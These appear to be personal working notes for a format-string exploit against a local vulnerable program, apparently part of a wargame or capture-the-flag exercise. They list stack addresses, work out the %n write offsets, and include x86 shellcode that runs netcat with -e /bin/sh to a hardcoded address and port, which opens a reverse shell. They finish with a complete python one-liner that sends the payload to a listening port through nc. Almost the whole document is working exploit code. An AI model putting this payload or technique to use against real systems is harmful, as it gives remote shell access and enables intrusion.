possibility epi (iniside of snprintf, so may not work) : 0xbffff1c4
other : 0xbffff1c4 (also)
other : 0xbffff1a4
other : 0xbffff1a4 (also)
other : 0xbffff1e4
other : 0xbffff284
other : 0xbffff354 (ret 0x14)
other : 0xbffff3b4
other : 0xbffff27c
other : 0xbffff27c (also)
other : 0xbfffec8c
other : 0xbfffeccc
other : 0xbfffeccc (also)
other : 0xbffff27c (vfprintf ret)
other : 0xbffff3cc (snprintf ret)

start of input : 0xbffff3ec
address of snprintf ret : 0xb7e76917


so i have to write 0xbffff3ec at 0xb7e76917

f3ec = 62444
bfff = 49151

shellcode:
\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38
(length : 110)



b7e76919 + b7e76917 + shellcode
4 + 4 + 110 = 118
49151 - 118 = 49033
62444 - 49151 = 13293

'\xb7\xe7\x69\x19\xb7\xe7\x69\x17' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x38' + '%49033d%5$n' + '%13293d%6$n'



actually, the address is wrong, because it's actually 0xb7e76917 + 8 (two addresses at the start of the string)

(the port is 9997 now)
python -c "print '\xb7\xe7\x69\x19\xb7\xe7\x69\x17' + '\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x37' + '%49033d%5$n' + '%13293d%6$n'" | nc localhost 56031